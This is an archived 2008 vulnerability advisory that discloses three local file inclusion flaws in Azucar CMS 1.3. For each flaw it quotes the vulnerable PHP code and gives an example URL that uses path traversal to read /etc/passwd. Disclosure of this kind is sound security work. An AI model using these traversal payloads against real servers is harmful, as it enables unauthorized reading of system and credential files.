DSECRG-08-012.txt

2008-02-06T00:00:00
ID PACKETSTORM:63305
Type packetstorm
Reporter Sh2kerr
Modified 2008-02-06T00:00:00

Description

                                        
                                            `  
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-012  
  
  
Application: Azucar CMS  
Versions Affected: 1.3  
Vendor URL: http://azucarcms.sourceforge.net/en_home.htm  
Bug: Multiple Local File Include  
Exploits: YES  
Reported: 30.01.2008  
Vendor Response: NONE  
Date of Public Advisory: 05.02.2008  
Authors: Alexandr Polyakov, Stas Svistunovich  
Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)  
  
  
  
Description  
***********  
  
Azucar CMS has Multiple Local File Include vulnerabilities.  
  
  
1. Local File Include vulnerabilities found in scripts index.php and index_sitios.php  
  
Code  
****  
#################################################  
  
if (isset($_GET[_VIEW]) && ereg("^src|^vistas", $_GET[_VIEW]))  
include($_GET[_VIEW]);  
else  
header("Location: html/sitio/");  
  
#################################################  
  
Example:   
  
http://[server]/[installdir]/index.php??view=src/sistema/vistas/../../../../../../../../../../../../../etc/passwd  
  
  
2. Local File Include vulnerability found in script src/sistema/vistas/template/tpl_inicio.php  
  
Code  
****  
#################################################  
  
$vista = (isset($_GET[_VIEW])) ? $_GET[_VIEW] : PATH_PROYECTO . 'vistas/index.php';  
  
include($vista);   
  
#################################################  
  
Example:  
  
http://[server]/[installdir]/src/sistema/vistas/template/tpl_inicio.php?_VIEW=../../../../../../../../../../../../../etc/passwd  
  
  
3. Local File Include vulnerability found in script html/sitio/index.php  
  
Code  
****  
#################################################  
  
if (isset($_GET[_VIEW])) {  
if (!file_exists($_GET[_VIEW])) {  
$vista_array = explode('/', $_GET[_VIEW]);  
$vista = $vista_array[0] . '/es_ES/' . $vista_array[2];  
} else  
$vista = $_GET[_VIEW];  
}  
  
$vista = (isset($_GET[_VIEW]) && ereg("^src|^vistas", $_GET[_VIEW])) ? $vista : PATH_PROYECTO . 'vistas/es_ES/index.php';  
include($vista);  
  
#################################################  
  
Example:  
  
http://[server]/[installdir]/html/sitio/index.php?view=vistas/../../../../../../../../../../../../../etc/passwd  
  
  
  
About  
*****  
  
Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.  
  
  
Contact: research [at] dsec [dot] ru  
http://www.dsec.ru (in Russian)  
`